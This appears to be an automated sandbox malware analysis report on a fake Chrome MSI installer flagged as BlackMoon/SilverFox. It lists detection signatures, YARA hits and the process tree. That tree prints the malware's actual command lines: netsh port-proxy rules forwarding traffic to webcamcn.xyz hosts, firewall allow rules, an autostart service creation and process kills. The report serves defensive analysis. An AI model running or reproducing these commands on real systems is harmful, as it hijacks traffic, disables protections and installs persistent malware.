Windows Analysis Report
sutup-Chrome.13.26.x64.msi

Overview

General Information

Sample name:sutup-Chrome.13.26.x64.msi
Analysis ID:1432094
MD5:86561e111e7ce97e13a9936b9b4ba849
SHA1:61cd40da9253a367e416c9ab67e73738f18948c3
SHA256:bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88
Tags:msi, SilverFox

Detection

BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected BlackMoon Ransomware
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for dropped file
Modifies the windows firewall
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Tries to evade analysis by execution special instruction (VM detection)
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 4408 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6052 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • LetsPRO.exe (PID: 4320 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 4564 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6640 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 1976 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5520 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6048 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 4912 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 2128 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5480 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5476 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5440 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • ChromeSetup.exe (PID: 4760 cmdline: "C:\Program Files (x86)\ChromeSetup.exe" MD5: 8884A9547AA410B697EFAD097F2B0013)
      • GoogleUpdate.exe (PID: 7324 cmdline: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" MD5: BAF0B64AF9FCEAB44942506F3AF21C87)
    • LetsPRO.exe (PID: 412 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6408 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 3664 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5596 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5144 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7284 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7268 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7192 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7224 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7200 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
  • LetsPRO.exe (PID: 4612 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
    • LetsPRO.exe (PID: 7380 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
  • cscript.exe (PID: 7752 cmdline: cscript C:\Users\user\99944\144977.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
  • cmd.exe (PID: 7800 cmdline: cmd /c cscript C:\Users\user\99944\144977.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cscript.exe (PID: 7816 cmdline: cscript C:\Users\user\99944\144977.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7916 cmdline: powershell.exe cscript C:\Users\user\99944\144977.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
  • sc.exe (PID: 7992 cmdline: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • netsh.exe (PID: 8012 cmdline: netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443 MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8048 cmdline: netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8080 cmdline: netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8108 cmdline: netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8136 cmdline: netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8164 cmdline: netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80 MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • taskkill.exe (PID: 7088 cmdline: taskkill /f /t /im wegame.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • taskkill.exe (PID: 380 cmdline: taskkill /f /t /im WeGame.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |

Source | Rule | Description | Author | Strings
5.2.LetsPRO.exe.1003c7a7.2.raw.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
5.2.LetsPRO.exe.1003c7a7.2.raw.unpack | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen |
  • 0x1c631:$s1: blackmoon
  • 0x1c671:$s2: BlackMoon RunTime Error:
14.2.LetsPRO.exe.10020253.2.raw.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
14.2.LetsPRO.exe.10020253.2.raw.unpack | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen |
  • 0x38b85:$s1: blackmoon
  • 0x38bc5:$s2: BlackMoon RunTime Error:
5.2.LetsPRO.exe.10020253.3.raw.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |

                  System Summary

                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript C:\Users\user\99944\144977.vbs, CommandLine: cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: cscript C:\Users\user\99944\144977.vbs, ProcessId: 7752, ProcessName: cscript.exe
                  Source: Process started, Author: Michael Haag: Data: Command: cscript C:\Users\user\99944\144977.vbs, CommandLine: cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: cscript C:\Users\user\99944\144977.vbs, ProcessId: 7752, ProcessName: cscript.exe
                  Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, CommandLine: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, ProcessId: 7992, ProcessName: sc.exe
                  Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe cscript C:\Users\user\99944\144977.vbs, CommandLine: powershell.exe cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: powershell.exe cscript C:\Users\user\99944\144977.vbs, ProcessId: 7916, ProcessName: powershell.exe
                  No Snort rule has matched

                  AV Detection

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe, Avira: detection malicious, Label: HEUR/AGEN.1362051
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe, Virustotal: Detection: 16%
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe, Joe Sandbox ML: detected
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD5AE04 CryptHashCertificate,30_2_6CD5AE04
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD37604 CryptUnprotectData,GetLastError,LocalFree,30_2_6CD37604
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD5B004 CryptQueryObject,CertFindCertificateInStore,CertFindCertificateInStore,CertCloseStore,30_2_6CD5B004
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CCD8ED8 CryptProtectData,LocalFree,30_2_6CCD8ED8
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD59D9B CryptHashData,30_2_6CD59D9B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CDC1DA5 CryptAcquireContextW,GetLastError,CryptReleaseContext,30_2_6CDC1DA5
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD59E01 CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,30_2_6CD59E01
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CCDD933 CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,30_2_6CCDD933
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe, Code function: 30_2_6CD59BDC CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptCreateHash,30_2_6CD59BDC
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe, File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dll
                  Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
                  Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
                  Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
                  Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
